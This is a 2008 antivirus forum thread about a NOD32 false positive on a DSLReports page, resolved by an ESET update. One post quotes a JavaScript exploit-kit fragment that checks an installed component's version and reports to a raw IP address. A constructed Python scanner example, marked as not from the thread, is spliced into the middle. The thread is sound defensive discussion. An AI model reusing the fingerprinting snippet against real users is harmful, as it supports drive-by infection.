View Full Version : Warning from NOD32 on DSLR-security-forum thread


FanJ
November 22nd, 2008, 10:57 PM
Posting in this thread at DSLR Security forum:
http://www.dslreports.com/forum/r21467816-Key-Logger-586523233

-{ Quote: "
Well, I got a warning from NOD32 on that thread:

hxxp://www2.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site~start=20
probably a variant of JS/TrojanDownloader.Agent.NFB trojan
" }-

FanJ
November 23rd, 2008, 11:13 AM
The thread at the DSLR board on which NOD32 gives a warning is this one:

hxxp://www.dslreports.com/forum/r21054284-Trojan-Win32Agentpz-from-Stoneybrook-Assisted-Living-site

(I have changed http into hxxp)

That thread is two pages long on my machine and I get the warning on the second page.

I have already sent an IM to Marcos here on the Wilders board.
I completely understand that it is weekend and that ESET has at the moment not the time to look at it.
I hope that they will have a look at it after the weekend (please).

FanJ
November 23rd, 2008, 11:16 AM
Maybe the following two screenshots are too big.

IMON warning

FanJ
November 23rd, 2008, 11:17 AM
AMON warning

ASpace
November 23rd, 2008, 11:43 AM
Do you suspect that the javascript detection is a false positive?

FanJ
November 23rd, 2008, 11:53 AM
-{ Quote: "Do you suspect that the javascript detection is a false positive?" }-

Hi HiTech_boy,

Somehow that is indeed what I'm thinking.
I can hardly believe that there is malware on the DSLR/BBR security forum.
The warning I am getting makes me think of a heuristic detection.
I cannot have a look at that second page because NOD is blocking it and I do not want to disable NOD at this moment.
If I see any warning from NOD32 on a file, of course I would send it in in a password-protected ZIP file; but what to do in this case? That's why I have sent Marcos an IM here at Wilders.

doktornotor
November 23rd, 2008, 11:55 AM
-{ Quote: "Do you suspect that the javascript detection is a false positive?" }-

There's no malicious JS in there... this gets triggered on the plaintext code listing there. Already been debated before with some other example:

var i,l,v;
num = 2;
s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
l = testing.isComponentInstalled(s,'ComponentID');
v = testing.getComponentVersion(s,'ComponentID');
if (l == true) {
x = v.split(',');
if ( (x[0]!=0) && (x[2]<3810) ) {
num = 1;
}
}

c = 'http://58.65.232.33/'+'counter.php'+'?b='+num;

Try to paste the above between <HTML><BODY><PRE> paste here </PRE></BODY></HTML> tags, save the file as test.html or whatever, and watch NOD32 quarantine it.
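To illustrate why an inert listing in <PRE> gets flagged like live script, here is an added example (not from this thread or from ESET): a toy content scanner with a hypothetical fingerprinting rule, shown once context-unaware and once tracking whether text sits in a <script> element or an event-handler attribute. The rule, the sample documents and the function names are all constructed for this example; the rule is not ESET's actual heuristic.

```python
import re
from html.parser import HTMLParser

# Hypothetical heuristic (constructed here, not ESET's signature): a component
# lookup by CLSID followed closely by a version query, as in the listing above.
FINGERPRINT_RULE = re.compile(
    r"isComponentInstalled\s*\(.*?\)[\s\S]{0,200}?getComponentVersion\s*\("
)

def naive_scan(document: str) -> bool:
    """Context-unaware scan: matches the pattern anywhere in the file, so a
    listing inside <pre> is flagged exactly like a real <script> block."""
    return FINGERPRINT_RULE.search(document) is not None

class ScriptContextScanner(HTMLParser):
    """Context-aware scan: only text inside <script> elements and on* event
    handler attributes is treated as JavaScript the browser would run."""
    def __init__(self):
        super().__init__()
        self.in_script = False
        self.hits = []  # (context, first 40 chars of the matching text)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        for name, value in attrs:
            if name.startswith("on") and value and FINGERPRINT_RULE.search(value):
                self.hits.append((f"attribute {name}", value[:40]))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and FINGERPRINT_RULE.search(data):
            self.hits.append(("script element", data.strip()[:40]))

def context_aware_scan(document: str) -> list:
    scanner = ScriptContextScanner()
    scanner.feed(document)
    scanner.close()
    return scanner.hits

# Constructed sample input: lines from the listing above, once pasted as plain
# text inside <pre> (the forum page) and once as live <script>.
LISTING = """s = '{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';
l = testing.isComponentInstalled(s,'ComponentID');
v = testing.getComponentVersion(s,'ComponentID');
"""
FORUM_PAGE = "<html><body><pre>" + LISTING + "</pre></body></html>"
LIVE_PAGE = "<html><body><script>" + LISTING + "</script></body></html>"
```

naive_scan returns True for both documents, while context_aware_scan returns no hits for FORUM_PAGE and one "script element" hit for LIVE_PAGE.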

FanJ
November 23rd, 2008, 12:06 PM
said by doktornotor:
-{ Quote: "
this gets triggered on the plaintext code listing there. Already been debated before with some other example:
" }-

Hi,

Where has this been debated before?

doktornotor
November 23rd, 2008, 12:13 PM
-{ Quote: "
Where has this been debated before?" }-

Cannot find the debate ATM, anyway same problem - some code pasted in plaintext on a website that doesn't get executed at all triggered this. This one is apparently a heuristics issue specific to NOD32; tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well.

FanJ
November 23rd, 2008, 12:19 PM
-{ Quote: "Cannot find the debate ATM, anyway same problem - some code pasted in plaintext on a website that doesn't get executed at all triggered this. This one is apparently a heuristics issue specific to NOD32; tried w/ Avira Premium, no such false positive. Reproduced w/ v3 and v4 beta as well." }-

OK, thanks for checking it !

Let's hope that ESET will jump in too (haven't heard back from Marcos yet; but as I said, it is the weekend now).

FanJ
November 23rd, 2008, 06:44 PM
As for this moment: no official reply from ESET (neither here in public, nor at the DSLR/BBR board in public, nor in private from Marcos).
Like I said, I know that it is the weekend; but I would have liked a reply like "we will look at it". But even that did not happen.

ASpace
November 24th, 2008, 04:41 AM
Currently with update 3634, I no longer see any alerts and I can browse the forum.

doktornotor
November 24th, 2008, 05:32 AM
-{ Quote: "Currently with update 3634, I no longer see any alerts and I can browse the forum." }-

Yeah, looks good now. :thumb:

FanJ
November 24th, 2008, 09:48 AM
Yep, it's fixed :thumb:

Thank you ESET, and thank you Marcos for your IM. I really do appreciate it !